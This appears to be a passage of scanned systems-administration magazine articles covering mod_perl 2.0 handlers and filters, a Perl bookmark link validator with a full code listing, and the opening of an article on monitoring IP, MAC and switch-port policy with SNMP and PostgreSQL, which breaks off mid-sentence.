use lib qw(/path/to/perl/libs);
use Apache2;

1;

mod_perl and CGI

mod_perl speeds up your CGI scripts by getting rid of the infamous
"fork, compile, execute" problem. When running a normal
CGI, the Apache Web server forks a Perl interpreter, which in turn
compiles and executes the Perl source. With normal CGIs, this
process is repeated for each request made to the CGI. We remove
the expensive forking step with mod_perl by having an embedded
interpreter inside of our Web server. In addition, mod_perl will
compile the Perl source on server startup and keep it in memory.
This leaves only the actual execution of the code on each request.

As I'm sure you can imagine, this greatly increases the speed
of most CGIs, often as much as 100 times their original speed. To
configure this for all of your Perl CGIs in the directory /modperl/,
simply add this to your Apache's httpd.conf:

<Location /modperl/>
    SetHandler perl-script
    PerlResponseHandler ModPerl::Registry
    PerlOptions +ParseHeaders
    Options +ExecCGI
</Location>

This instructs mod_perl to compile the Perl scripts in the /modperl/
directory (once for each Apache child) and store them in memory.
If a script is edited on disk, mod_perl is smart enough to recompile it on
the next request to reflect your changes.

URL Transformation 

One challenge that faces many Web site administrators is that of
reworking your file system layout without breaking existing bookmarks
and deep links into your site. Sometimes these can be fixed
with redirects or mod_rewrite rules, but these can quickly become
unwieldy on large sites.

Suppose you run a news Web site where your articles are stored in
a different directory each day and you want to change this layout
slightly. You want to be able to change requests for:

http://www.example.com/20041106/article-title.html

into something like:

http://www.example.com/archive/2004/11/06/article-title.html

on the fly. A URI is mapped to filenames in the TransHandler phase
of the Apache life cycle. Using mod_perl, we can easily change the
default behavior with a translation handler like this:

package My::LayoutChanger;

use strict;
use warnings;

use Apache::RequestRec ();
use Apache::Const -compile => qw(DECLINED);

sub handler {
    my $r = shift;

    # See if the requested URI follows our old style of having
    # an eight digit directory in the form of /YYYYMMDD/
    if( $r->uri =~ m|^/\d{8}/|o ) {

        # Extract the parts of the date and the filename from the
        # requested URI
        my ($year, $month, $day, $file) =
            $r->uri =~ m|^/(\d\d\d\d)(\d\d)(\d\d)/(.*?)$|o;

        # Replace the URI transparently
        $r->uri("/archive/$year/$month/$day/$file");
    }

    # Return DECLINED so that other trans handlers can be
    # called if necessary
    return( Apache::DECLINED );
}

1;

You configure this in Apache's httpd.conf with the following directives:

PerlModule My::LayoutChanger
PerlTransHandler +My::LayoutChanger

A handler like this could easily be converted to handle multiple site 
redesigns in the same module, or you can stack the handlers so that 
each new filesystem layout is a different Perl module, each handling 
a different set of URI rewrites. You can also map an existing static 
HTML site into a new dynamic application by building the URI and 
the HTTP query string with $r->args. 
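
The URI rewrite itself is independent of Apache and can be tried out in isolation. The following Python sketch mirrors only the pattern matching of the translation handler; the function name translate_uri is made up for illustration, and the sketch makes no attempt to model the Apache request object.

```python
import re

# Old layout: /YYYYMMDD/filename
OLD_LAYOUT = re.compile(r"^/(\d{4})(\d{2})(\d{2})/(.*)$")


def translate_uri(uri):
    """Map /YYYYMMDD/file to /archive/YYYY/MM/DD/file; leave other URIs alone."""
    match = OLD_LAYOUT.match(uri)
    if match is None:
        return uri
    year, month, day, filename = match.groups()
    return f"/archive/{year}/{month}/{day}/{filename}"
```

URIs that do not start with an eight-digit directory pass through unchanged, which corresponds to the handler leaving $r->uri untouched before returning DECLINED.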

Dynamic Content 

One of mod_perl's most interesting features is I/O filtering.
Filtering can be used to modify static files on the fly or even the
output of another program. If, for example, you would like to
automatically add the last modified date and time to the bottom of
all of the pages in a particular directory, you would use a filter
much like this:

package My::Filter;

use strict;
use warnings;

use base qw(Apache::Filter);
use APR::Finfo ();    # For file information
use APR::Table ();    # For $f->r->headers_out->unset
use Apache::Const -compile => qw(OK);

use constant BUFFER => 1024;

sub handler {
    my $f     = shift;       # Our filter object
    my $r     = $f->r;       # Our Request object
    my $finfo = $r->finfo;   # Our file info

    # Convert last modified time into a human readable format
    my $time = localtime($finfo->mtime);

    # Unset our Content-Length header since we will be changing
    # the content's length.
    unless( $f->ctx ) {
        $f->r->headers_out->unset('Content-Length');
        $f->ctx(1);
    }

    # Read the file 1024 bytes at a time
    while( $f->read(my $buf, BUFFER) ) {

        # Replace the closing BODY tag with our last modified
        # date and time
        if( $buf =~ /<\/BODY>/i ) {
            $buf =~ s/<\/BODY>/Last modified: $time<\/BODY>/i;
        }
        $f->print($buf);
    }

    return( Apache::OK );
}

1;

To configure this filter for the /content/ directory, you would add the 
following to your httpd.conf: 


PerlModule My::Filter
<Directory /content/>
    SetHandler modperl
    PerlOutputFilterHandler My::Filter
</Directory>
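
The substitution at the core of the filter can be sketched outside of Apache as follows. This is a Python illustration with an invented function name, add_last_modified, and it works on a whole document held in memory. The Perl filter above processes 1024-byte chunks instead, so a closing BODY tag that happens to straddle two chunks would presumably not be matched there.

```python
import re
import time

CLOSING_BODY = re.compile(r"</body>", re.IGNORECASE)


def add_last_modified(html, mtime):
    """Insert 'Last modified: <time>' just before the first closing BODY tag."""
    stamp = time.ctime(mtime)  # human-readable local time
    # A function is used as the replacement so the original tag text
    # (including its letter case) is kept as matched.
    return CLOSING_BODY.sub(
        lambda m: f"Last modified: {stamp}{m.group(0)}", html, count=1
    )
```

A document without a closing BODY tag is returned unchanged.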

Conclusion 

While mod_perl gives you easy access to tweaking how your
Apache server behaves, it also proves to be an efficient and scalable
platform on which to build large Web sites and enterprise applications.
mod_perl is used for such large traffic sites as slashdot.org,
livejournal.com, and ticketmaster.com. I've been building LAMP
(Linux Apache Mod_perl PostgreSQL) applications with mod_perl
for years and have never felt limited by it.

I hope this introduction to mod_perl 2.0 has piqued your interest.
The mod_perl homepage (http://perl.apache.org) offers a
large collection of online documentation, links to print resources,
and the users mailing list, which can help you take full advantage
of mod_perl.

If you get stuck solving a mod_perl problem, send a question to
the mod_perl users mailing list, which often provides answers
within a few short minutes. If you don't mind a slower response
time, feel free to email me directly (frank@revsys.com).

Frank Wiles is the IT Manager for Sunflower Broadband in Lawrence, Kansas
(http://www.sunflower.com). He also does systems administration and
programming consulting via his company Revolution Systems, LLC. Frank can
be reached at: frank@revsys.com.




Checking Your Bookmarks


Like most people, I've bookmarked about a third of the known
Internet by now. Of course, sites go away, and URLs become
invalid, so some of my lesser-used bookmarks are pointing
off into 404-land.

Some browsers have an option to periodically revalidate bookmarks.
My favorite browser lacks such a feature, but it does include
the ability to export an HTML file of all the bookmarks and reimport
a similar file in a way that can be easily merged back into my
existing bookmark setup. So, I thought I'd take a whack at a Perl-based
bookmark validator, especially one that worked in parallel so
that I could get through my bookmark list fairly quickly. The result
is in Listing 1, below.

Lines 1 through 3 declare the program as a Perl program and
turn on the compiler restrictions and warnings as good programming
practice.

Lines 5 through 7 pull in three modules that are found in the
CPAN. The HTML::Parser module enables my program to
cleanly parse HTML with all its intricacies. The
LWP::Parallel::UserAgent module provides a means to fetch
many Web pages at once. And finally, HTTP::Request::Common
sets up an HTTP::Request object so that I can fetch it with the
user agent.

Lines 9 and 10 set up the user interface for this program. I can
use the program as a filter:

./this_program <Bookmarks.html >NewBookmarks.html

or as an in-place editor:

./this_program Bookmarks.html

As an in-place editor, the Bookmarks.html file will be renamed to
Bookmarks.html~ (with an appended tilde), and the new version
will appear at the original name.

Lines 11 to 19 edit each file (usually just one) in turn, or the
standard input as one file. Line 12 slurps the entire file in to $_. Two
passes are performed over the HTML text: the first pass in line 14
finds the existing links, and the second pass in line 18 edits the
HTML with additional DEAD - text for links that were found broken.
In between, we'll check the validity of the discovered URLs, in line
16. This is our entire top-level code, using named subroutines to
clearly delineate the various phases and couplings of this program. I
find it helpful to break down a program in this way.

Let's look at how the links are found, in the subroutine beginning
in line 21. First, we'll accept the input parameter in line 22. Second,
we'll create a staging variable for the return value in line 24.


Lines 26 to 34 create an HTML::Parser object. Creating a parser 
object is an art form, because there are so many buttons and dials 
and levers on the instantiation and later reconfiguration of the 
parser. My usual trick is to find a similar example and then modify 
it until it does what I want. 

In this case, we want to be notified of all start tags, so we'll
define a start handler (line 28) consisting of an anonymous subroutine
(lines 29 to 32) and a description of the parameters that will be
sent to the subroutine (line 33). We're asking for the tagname (like
"a") and the attribute hash as the only two parameters. We extract
these parameters in line 30.

Line 31 ignores all a tags that don’t have an href attribute, 
which skips over local anchors and anything else more bizarre. Line 
32 creates an element in the hash with the key being the same as the 
URL. The value is unimportant at this point, although we check 
whether the value is DEAD later, so that would be a bad value for an 
initialization. 

Once the parser is created, we'll tell it to parse a string and then
finish up in lines 36 and 37. When start tags are seen, the requested
callback is invoked, populating the %urls hash at the appropriate
time. At the end of the input string, we'll return a reference to that
populated hash so that the caller has some data to manipulate.
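
For readers who want to experiment with the same callback idea outside of Perl, here is a rough Python equivalent of the link-extraction pass. It is only a sketch using the standard library's html.parser; the class name LinkCollector is invented for illustration, and the empty string stored for each URL is an arbitrary placeholder value.

```python
from html.parser import HTMLParser


class LinkCollector(HTMLParser):
    """Collect the href of every <a> start tag into a dict keyed by URL."""

    def __init__(self):
        super().__init__()
        self.urls = {}

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lowercased.
        if tag != "a":
            return
        href = dict(attrs).get("href")
        if href:  # skips local anchors such as <a name="top">
            self.urls[href] = ""


def extract_links(html):
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    return parser.urls
```

As in the Perl version, the parser calls back for every start tag, and the handler simply ignores anything that is not a link.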

The validate_links routine (beginning in line 42) is really the
heart of this program, because we'll now take the list of URLs (the
keys of the hash in line 43) and verify that they are still dot-com, not
dot-bomb.

Line 45 creates the parallel user agent object. This object is a
virtual browser with the ability to fetch multiple URLs at once
(default 5). The max_size value says that we don't need to see
anything past the first byte of the response, so we can stop when
the first "chunk" of text has been read from the remote server.
(This is actually a feature of LWP::UserAgent, from which
LWP::Parallel::UserAgent inherits.)

Lines 47 to 49 set up the list of URLs that the user agent will
fetch once activated. We'll just grab the keys (efficiently) from
the hash referenced by $urls and call the register method of the
user agent with an HTTP::Request object that GETs the corresponding
URL.

Listing 1 Perl-based bookmark validator

=1=     #!/usr/bin/perl
=2=     use strict;
=3=     use warnings;
=4=
=5=     use HTML::Parser;
=6=     use LWP::Parallel::UserAgent;
=7=     use HTTP::Request::Common;
=8=
=9=     $^I = "~";
=10=    @ARGV = "-" unless @ARGV; # act as filter if no names specified
=11=    while (@ARGV) {
=12=      $_ = do { local $/; <> };
=13=
=14=      my $urls = extract_links($_);
=15=
=16=      validate_links($urls);
=17=
=18=      rewrite_html($_, $urls);
=19=    }
=20=
=21=    sub extract_links {
=22=      my $html = shift;
=23=
=24=      my %urls;
=25=
=26=      my $p = HTML::Parser->new
=27=        (
=28=         start_h =>
=29=         [sub {
=30=            my ($tagname, $attr) = @_;
=31=            return unless $tagname eq "a" and my $href = $attr->{href};
=32=            $urls{$href} = "";
=33=          }, "tagname, attr"],
=34=        ) or die;
=35=
=36=      $p->parse($html);
=37=      $p->eof;
=38=
=39=      return \%urls;
=40=    }
=41=
=42=    sub validate_links {
=43=      my $urls = shift;         # hashref
=44=
=45=      my $pua = LWP::Parallel::UserAgent->new(max_size => 1);
=46=
=47=      while (my ($url) = each %$urls) {
=48=        $pua->register(GET $url);
=49=      }
=50=
=51=      for my $entry (values %{$pua->wait(30)}) {
=52=        my $url = $entry->request->url;
=53=        my $success = $entry->response->is_success;
=54=        warn +($urls->{$url} = $success ? "LIVE" : "DEAD"), " $url\n";
=55=      }
=56=
=57=      # return void
=58=    }
=59=
=60=    sub rewrite_html {
=61=      my $html = shift;
=62=      my $urls = shift;         # hashref
=63=
=64=      my $dead = 0;             # mark the next text as "DEAD"
=65=
=66=      my $p = HTML::Parser->new
=67=        (
=68=         start_h =>
=69=         [sub {
=70=            my ($text, $tagname, $attr) = @_;
=71=            if ($tagname eq "a" and my $href = $attr->{href}) {
=72=              $dead = 1 if $urls->{$href} eq "DEAD";
=73=            }
=74=            print $text;
=75=          }, "text, tagname, attr"],
=76=         text_h =>
=77=         [sub {
=78=            my ($text) = @_;
=79=            if ($dead) {
=80=              $text = "DEAD - $text" unless $text =~ /DEAD -/;
=81=              $dead = 0;
=82=            }
=83=            print $text;
=84=          }, "text"],
=85=         default_h =>
=86=         [sub { print shift }, 'text'],
=87=        ) or die;
=88=
=89=      $p->parse($html);
=90=      $p->eof;
=91=      # return void
=92=    }

Line 51 is where our program will spend most of the "real"
time. The wait method call tells the user agent to do its job, waiting
at most 30 seconds for each connection and response. The
result of the wait method is a hashref whose values are
LWP::Parallel::UserAgent::Entry objects representing the result
of attempting to fetch each page. Calling request on these objects
(as in line 52) gives us the original request, while the response
method (as in line 53) gives us the corresponding response. We
fetch the original URL and its success status into a couple of variables
and then update the hash referenced by $urls with a
LIVE/DEAD code in line 54, also logging each result to STDERR for
information purposes.
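
The same fan-out pattern can be sketched in Python with a thread pool. This is an illustration only, not a port of LWP::Parallel::UserAgent: the is_alive parameter is a hypothetical callable supplied by the caller (in real use it would issue an HTTP GET with a timeout and report success), and the limit of five workers simply mirrors the default mentioned above.

```python
from concurrent.futures import ThreadPoolExecutor


def validate_links(urls, is_alive, max_workers=5):
    """Set urls[url] to "LIVE" or "DEAD" in place, checking links concurrently.

    urls     -- dict keyed by URL (values are overwritten)
    is_alive -- callable taking a URL and returning True or False
    """
    targets = list(urls)
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # pool.map returns results in the same order as targets.
        for url, ok in zip(targets, pool.map(is_alive, targets)):
            urls[url] = "LIVE" if ok else "DEAD"
```

Keeping the network call behind a parameter makes the bookkeeping easy to test without touching the network.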

Once we have a hash mapping each URL to a LIVE/DEAD
code, it's time to patch up the original file, marking all dead links
with a prefix of DEAD using the rewrite_html routine beginning
in line 60.

Lines 61 and 62 capture the incoming parameters: the original 
HTML text, and the reference to the hash of the URLs, and their status. 

Line 64 sets up a $dead flag. If we see a start tag that begins a 
link to a dead page, we'll set that flag true, and then update the first 
following text to include our DEAD - prefix, resetting the variable as 
needed. 

Lines 66 to 87 set up a new HTML::Parser object. This one is a
bit more complex than the previous one, because we have to watch
for link start tags, the text of links, and copy everything else
through.

As before, a start handler is enabled, starting in line 68. Because
we're now echoing the input text, we'll ask for the original text as
one of the parameters, printed in line 74.

Lines 71 to 73 determine whether the current tag is indeed a
dead link. If so, line 72 sets $dead to 1.

Line 76 defines a text handler, called as the parser recognizes the
text of the HTML document. If we see some text, and our $dead
flag is set, we'll prefix the existing text with DEAD - and reset the
$dead flag. If the text already has the dead flag, we'll leave it alone,
so that we don't keep prefixing new additional text on every access.
The original or altered text is then printed in line 83.

Lines 85 and 86 define a "default" handler, called for everything
else that isn't a start tag or a main text, such as end tags, comments,
processing instructions, and so on. Here, we're just passing through
everything we don't otherwise care about.

Lines 89 and 90 cause the incoming HTML to be parsed, resulting
in the majority of the text being passed unmodified to the default
output handle, except for the dead links, which will have been
appropriately altered.
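
The flag-and-prefix logic of this second pass can also be sketched in Python. This is a rough illustration built on the standard library's html.parser, with invented names (DeadLinkMarker, rewrite_html). Unlike HTML::Parser's default handler, html.parser does not hand back the raw text of every construct, so end tags, comments, and entity references are rebuilt here and may differ slightly from the input (for example in letter case).

```python
from html.parser import HTMLParser


class DeadLinkMarker(HTMLParser):
    """Echo the document, prefixing the text of dead links with 'DEAD - '."""

    def __init__(self, status):
        super().__init__(convert_charrefs=False)
        self.status = status  # maps URL -> "LIVE" or "DEAD"
        self.dead = False     # True while waiting for a dead link's text
        self.out = []

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href")
        if tag == "a" and href and self.status.get(href) == "DEAD":
            self.dead = True
        self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        self.out.append(self.get_starttag_text())

    def handle_data(self, data):
        if self.dead:
            if "DEAD -" not in data:  # do not prefix twice on a later run
                data = "DEAD - " + data
            self.dead = False
        self.out.append(data)

    # Everything else is passed through, rebuilt from the parsed pieces.
    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")

    def handle_pi(self, data):
        self.out.append(f"<?{data}>")


def rewrite_html(html, status):
    marker = DeadLinkMarker(status)
    marker.feed(html)
    marker.close()
    return "".join(marker.out)
```

Running the result through rewrite_html a second time leaves it unchanged, which matches the behavior described for line 80 of the listing.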

And that's all there is! I save the current bookmarks into a file,
run the program, wait until it completes, and then I re-import the
modified HTML file as my new bookmarks. And now my bookmarks
are all fresh and shiny new. Until next time, enjoy!

Randal L. Schwartz is a two-decade veteran of the software industry, skilled
in software design, system administration, security, technical writing, and
training. He has coauthored the "must-have" standards: Programming Perl,
Learning Perl, Learning Perl for Win32 Systems, and Effective Perl
Programming. He's also a frequent contributor to the Perl newsgroups, and
has moderated comp.lang.perl.announce since its inception. Since 1985,
Randal has owned and operated Stonehenge Consulting Services, Inc.

NETWORKING


IP Policy Enforcement with Netinfo

Stefanos Harhalakis


A common problem faced by systems administrators who
don't have complete management of their network is IP
policy enforcement. There are a lot of tools for monitoring
routers and switches (referred to as network devices), but there are few
for monitoring the leaf nodes and their status.

It is not uncommon to find that there is a duplicate IP in a network
or that a user has changed his IP address or even the location
of his computer. (Here, "location" describes the switch port of a
user and not the actual physical location.) An administrator may
need to spend a couple of hours to actually resolve a duplicate IP
issue because he has to find both machines online.

Common policy enforcement techniques utilize MAC address
databases where each machine must be registered to be allowed to
access the network from specific switch ports. This solves the problem
in a tightly managed network but cannot prevent intruders from
abusing public access places. It is also almost impossible (and very
time consuming) to create and maintain a valid up-to-date MAC
address database.

Generally there are three entities comprising a network policy: 

* IP addresses 
• MAC addresses 
• Switch ports 

With the introduction of Layer 3 switches, a "sw itch port” is not dif¬ 
ferent from a “router port”. It is more convenient to refer to these as 
network device ports and distinguish them as: 

* Switched ports 
• Routed ports 



- A. 




Typically, an administrator will need to define restrictions on various
combinations of these entities. For example, it may be desirable
to restrict a particular MAC address to a specific switch port or
range of ports or to bind a MAC address to a particular IP address.
Similarly, the administrator may want to restrict a particular IP
address to a specific set of ports.

This description can be represented as a triangle with IP,
MAC, and Port as corners and a two-way arrow on each edge.



Here an IP address restricts the MAC address, a MAC address
restricts the IP address, a MAC address restricts the Port, a Port
restricts the MAC address, an IP address restricts the Port, and a
Port restricts the IP address. Note that IP->MAC is
not the same as MAC->IP because an IP address may be used by
one MAC address only, but a MAC address may be allowed to use
more than one IP address.
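
The asymmetry can be made concrete with a small sketch. It assumes, purely for illustration, that IP->MAC rules are kept as a mapping from an IP address to its single permitted MAC address and that MAC->IP rules are kept as a mapping from a MAC address to a set of permitted IP addresses. The names and sample addresses are hypothetical and are not taken from Netinfo.

```python
# Hypothetical rule stores; names and addresses are illustrative only.
ip_to_mac = {"10.0.0.5": "00:11:22:33:44:55"}                  # IP->MAC: one MAC per IP
mac_to_ips = {"00:11:22:33:44:55": {"10.0.0.5", "10.0.0.6"}}   # MAC->IP: many IPs per MAC


def ip_allows_mac(ip, mac):
    """IP->MAC: True if no rule exists for this IP or the MAC matches it."""
    allowed = ip_to_mac.get(ip)
    return allowed is None or allowed == mac


def mac_allows_ip(mac, ip):
    """MAC->IP: True if no rule exists for this MAC or the IP is in its set."""
    allowed = mac_to_ips.get(mac)
    return allowed is None or ip in allowed
```

In this sample data, 10.0.0.6 is permitted for the MAC address by the MAC->IP rule, yet any other MAC address could also use 10.0.0.6 because no IP->MAC rule exists for it.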

Here are some examples that illustrate these restrictions: 

• A user has her computer on a switched port (let's say FastEthernet 1).
The administrator wants to allow this user to change her computer
without being bothered, so he configures the port to allow only
this user's IP address. If this user ever changes her
IP address, the administrator will be notified. Note that the user
will still be able to change her NIC. We may also want to restrict this
IP address so that it can be used only at this switched port.

• A user owns a laptop computer and has a configured address for it.
Now this laptop can be found in a lot of places; DHCP may help
here, but sometimes we want to reserve special addresses for people,
so we must maintain another IP<->MAC database in the
DHCP configuration. We simply allow this user to have a fixed IP
address, and we associate his MAC address with his IP address and
vice versa. This way no one else will be able to use this IP address,
and this MAC address will use only this IP address.

Policy Enforcement 

Enforcing the policy consists of: 

• Monitoring the network and collecting data.

• Processing data and detecting violations.

• Performing actions for detected violations.

There can be two approaches to policy enforcement. First, you
can prevent violations from happening. This technique is quite
hard to implement and administer. It also does not
inform the administrator of violations (most of the time).

Figure 2 Per subnet view (discovered IP addresses for group 195.251.123.0/24; columns include IP, Location, and Registered)

Figure 3 Per monitored device view (columns: Interface, IP, MAC, When, Action)

Second, you can detect violations and 
perform some actions, either by hand or 
by means of scripts/programs. 

Experience shows that policy “enforcement”
is not always required. It is
often more convenient simply to monitor
policy violations instead of enforcing the policy.

Users who violate network policy must
not be considered intruders. In fact, there
are cases where it is more important for a
user to have network access even if he has
violated the policy rules. After monitoring
our network for about two years, we found
that abuses made up about 1% of the total
number of violations detected. Allowing a
user who has committed a violation to keep
network access also helps in case of false
alarms and administration mistakes.

The MAC<->IP restrictions are less
frequently used when we have the
MAC<->Port and IP<->Port options. This
should be expected since a MAC address
database for 1000+ machines is very hard
to create and maintain. There are also cases
where machines are discarded and stale
entries remain in the database.

Collecting the Information 

Collecting the information can be
quite easy as long as the hardware supports
it. Here I will focus on Cisco
devices, but this technique can be applied
to other hardware vendors, too. We're
going to collect information using SNMP,
so it must be enabled on the network devices
(more on this later).

We’ll use PostgreSQL to store the
information. For our purposes, we will
need to create tables to hold the data and
will also need to timestamp them.
Timestamping the collected data is essential
because we want our system to
remember what happened. Creating a simple
program that only knows the current
image is easier, but it leads to serious trouble:
devices that are shut off or inaccessible can mess
up our image of the network.

We need to have a table for all the
devices that we’re going to monitor in our
network (referred to as monitored network
devices or monitored devices). This table
holds the IP address of each device (routers
and switches), the community string, a
unique ID (we should not use the IP
address as the key, for performance reasons), and a
convenient name.

Before beginning, we need to know
which interfaces are available on each
monitored network device so that we
can map users to interfaces later. We do
this by fetching IF-MIB::ifDescr and
IF-MIB::ifAlias for each device, which
will give us names and descriptions for
each interface. We store this information
in a table that contains a unique ID for
each entry, a device ID, the ifIndex value
of each interface, the interface name, and
the interface description.

We also need to collect the following: 

• IF-MIB::ifPhysAddress, which holds the
MAC address of each interface.

• IP-MIB::ipAdEntIfIndex, which holds the
IP addresses that are configured on each
interface. Such an entry indicates that a
port is a routed port, so we mark it appropriately.
We combine this information
with IP-MIB::ipAdEntNetMask and now
we know which IP networks are available
in our network. This is very useful
because we will not have to manually
update a list of our IP networks. This
solves a problem when Proxy ARP is
implemented and the ARP tables are
filled with useless (for our purposes)
information.

• mib-2.17.1.4.1.2, which has a mapping of
ifIndex to an internal interface number.
It is required for Cisco devices only.

• enterprises.9.9.46.1.3.1.1.3.1, which returns
a list of all the configured VLANs in the
switch. This is required for Cisco devices
because they need to be queried for each
VLAN as if they were different devices,
using a community name in the form of
XXXX@vlanID where XXXX is the
community name. Requesting information
for public will return information
about VLAN 1 only, so we need to perform
another request using public@2 if there is
a VLAN 2 configured.

• IF-MIB::ifType, which holds the IANA
interface type ID. This is required because
we want to ignore some interfaces and
mask out VLANs.
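
The per-VLAN community naming described in the list above can be sketched as a small helper. This is only an illustration of the XXXX@vlanID convention; the function name is hypothetical, and the SNMP queries themselves are left out.

```python
def vlan_communities(community, vlan_ids):
    """Return the community string to use for each VLAN ID.

    VLAN 1 is answered under the plain community name; every other VLAN
    is queried as "<community>@<vlan id>", as described in the text.
    """
    result = {}
    for vlan in sorted(set(vlan_ids)):
        result[vlan] = community if vlan == 1 else f"{community}@{vlan}"
    return result
```

For a switch with VLANs 1, 2, and 301 and the community name public, the helper yields public, public@2, and public@301, one query target per VLAN.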

Next, we want to know which IP addresses
are being used by each MAC address in our
network. This can be done by collecting all
the ARP tables (let's say every 15 minutes)
using IP-MIB::ipNetToMediaPhysAddress.
We want the ARP tables from routers
because they hold associations for all the
IPs that are known on each routed port.
Since switches can be Layer 3 and can have
routed ports, we are forced to collect the
ARP tables from them, too. For each ARP
entry we collect, we update our database by
storing the new IP-MAC pairs and updating
existing ones. ARP tables can have only
one entry per IP address, so we will use the
IP address as the primary key of that table.
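
A minimal sketch of this update step, assuming the table is modelled as an in-memory dictionary keyed by IP address rather than a PostgreSQL table. The function and field names are hypothetical.

```python
import time


def update_arp(ips, arp_entries, now=None):
    """Merge freshly collected (ip, mac) pairs into the ips table.

    ips maps ip -> {"mac": ..., "ts": ...}; the IP is the key because an
    ARP table holds at most one entry per IP address. Entries that are
    not seen in this run keep their old timestamp.
    """
    now = time.time() if now is None else now
    for ip, mac in arp_entries:
        ips[ip] = {"mac": mac.lower(), "ts": now}
    return ips
```

Because the IP address is the key, a second collection run that sees the same IP with a different MAC address simply overwrites the earlier pair and refreshes its timestamp.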

We also want to know where each MAC
address is located. For Cisco switches this
is known as the “mac-address-table” (for
switches running IOS) or “content addressable
memory (CAM)” (for switches running
CatOS). Both of these map a MAC
address to an interface, and the mapping is obtained by
fetching mib-2.17.4.3.1.2, which returns the
MAC address to port assignments. We also
need to get mib-2.17.4.3.1.3, which tells us
how each MAC address is known (learned,
security, internal, etc.).

This information by itself is all we need
to know about our network. The catch here
is that when we have something like:

Switch1 (port Fa0/1) <-> (port Fa0/1) Switch2 <-> 10 machines

the MAC addresses of the 10 machines are
known to both Switch1 and Switch2.
Switch1 will report them as being behind
its Fa0/1, and Switch2 will report them in
their correct location. In this case, we
ignore Switch1 and use the information
from Switch2 because it has more details.
Since we’re monitoring both switches, we
know what the internal MAC addresses of
Switch2 are (via IF-MIB::ifPhysAddress
and mib-2.17.4.3.1.3).

By combining this information, we
can find out that port Fa0/1 of Switch1
has another monitored device behind it.
For the sake of simplicity, we will
assume that all monitored devices are
connected using point-to-point links
(with no hubs or other non-monitored
devices between them). Now we can filter
out all information about Fa0/1 of
Switch1. This applies only to non-routed
interfaces.
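
The filtering step can be sketched as follows. The sketch assumes the forwarding data has already been collected as (device, port, MAC) tuples and that each monitored device's own internal MAC addresses are known. The function names and data layout are hypothetical and are not Netinfo's.

```python
def find_uplinks(fdb, device_macs):
    """Return (device, port) pairs that have another monitored device behind them.

    fdb is a list of (device, port, mac) forwarding entries; device_macs maps
    each monitored device to the set of its own internal MAC addresses.
    """
    owner = {mac: dev for dev, macs in device_macs.items() for mac in macs}
    uplinks = set()
    for dev, port, mac in fdb:
        other = owner.get(mac)
        if other is not None and other != dev:
            uplinks.add((dev, port))
    return uplinks


def leaf_entries(fdb, device_macs):
    """Keep only entries learned on ports without a monitored device behind them."""
    uplinks = find_uplinks(fdb, device_macs)
    return [entry for entry in fdb if (entry[0], entry[1]) not in uplinks]
```

A port is treated as an inter-switch link as soon as one MAC address learned on it belongs to a different monitored device, which matches the point-to-point assumption stated above.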

We store this information in a table by
itself that says that MAC address X is on
interface Y, where Y is an ifid that can be
looked up in the interfaces table to
return the device and interface
name/description.

Figure 1 is the complete database
schema that is used to store this information.
A table named “netdevs” contains all
the devices we are going to scan. This
table is filled and maintained by us. Its
fields are: a device ID, the IP address, a
name, the community, and a timestamp
that indicates when we last got data from this
device (this can help to detect devices that
are not reachable).

There is also a table named “interfaces”,
which holds the discovered interfaces of
the network. Here we have a unique ID, the
device ID indicating which device this
interface corresponds to, the ifDescr, the
ifAlias, and the ifType. There are also two
timestamps, as follows:

ls: This timestamp indicates when this
interface was last detected. This is used
to expire interfaces. There are times
when a device is not reachable or a network
error occurs during the SNMP
communication, so we don't want to
remove interface entries the first time
they are not detected. Using a timestamp,
we can expire interfaces after a
number of days.

last_had_netdev: This timestamp indicates
when a monitored network device was
last detected on this port. Just as with
“ls”, we want to hold a timestamp and
not a simple flag, because the connected
device may become unavailable. This
kind of instability would lead to an incorrect
network view, cause false alarms,
and mess up the recorded history of the
network.

Next, the “macs” table lists all the discovered
MAC addresses of our network. For
each entry, there is the interface where this
MAC entry was last seen and a timestamp.

The “ips” table stores all discovered
ARP entries (ip, mac) with a timestamp
(ts), and the “subnets” table stores all discovered
subnets. The “history” table is
explained later.

Figure 4 IP changes

Figure 5 Possible IP conflicts

All tables except “netdevs” have a
“flags” field, which is used to store various
flags. There are also some fields named
“shortdesc”, “comments”, or “description”,
which hold user notes and names.

Combining the Information 

Now we can combine the collected data
and see that IP address I is being used by
MAC address M, which is being served by
interface F. This information by itself is a
great boost to our administration efforts.
We can now view all our monitored devices
and see which IP and MAC
addresses are on each interface (Figure 2).
We can also find out who owns MAC
address M and where that user is located
(Figure 3).

Next, we need to store the history of our
network. We create a table that holds
IP:MAC:Interface triples and a timestamp
for each one. Every time we collect data,
we update this table by inserting new
entries and updating the timestamp of existing
ones. This way we can easily find out
which IP addresses were used by MAC
address M in the past or which MAC
addresses used IP address I (Figure 4). We
can also locate duplicate IPs (Figure 5).
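
The history update and the two lookups it enables can be sketched in a few lines. The sketch models the history table as a dictionary keyed by the (ip, mac, interface) combination. All names are hypothetical, and the real implementation keeps this data in PostgreSQL.

```python
from collections import defaultdict


def record(history, ip, mac, iface, ts):
    """Insert the (ip, mac, iface) combination or refresh its timestamp."""
    history[(ip, mac, iface)] = ts


def macs_for_ip(history, ip):
    """All MAC addresses that have ever been seen using this IP address."""
    return sorted({m for (i, m, _iface) in history if i == ip})


def duplicate_ips(history, since):
    """IP addresses used by more than one MAC address at or after `since`."""
    seen = defaultdict(set)
    for (ip, mac, _iface), ts in history.items():
        if ts >= since:
            seen[ip].add(mac)
    return {ip: sorted(macs) for ip, macs in seen.items() if len(macs) > 1}
```

Restricting the duplicate check to recent timestamps is a design choice of this sketch: it separates an IP address that moved from one machine to another long ago from two machines claiming it at about the same time.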

Creating Rules 

We want to implement a schema that
can hold the policy of our network. We do
this by annotating the collected data with
more information (descriptions, notes,
flags) and creating three more tables to
hold the IP-MAC, IP-Interface, and MAC-Interface
associations. Those are enough
for all six types of rules that were
described.

We populate those tables with information
regarding what is allowed for each
entity and we set some flags. For example,
we edit an interface and say that it should
serve only MAC addresses M1, M2, and
M3, and that only IP addresses I1 and I2 can
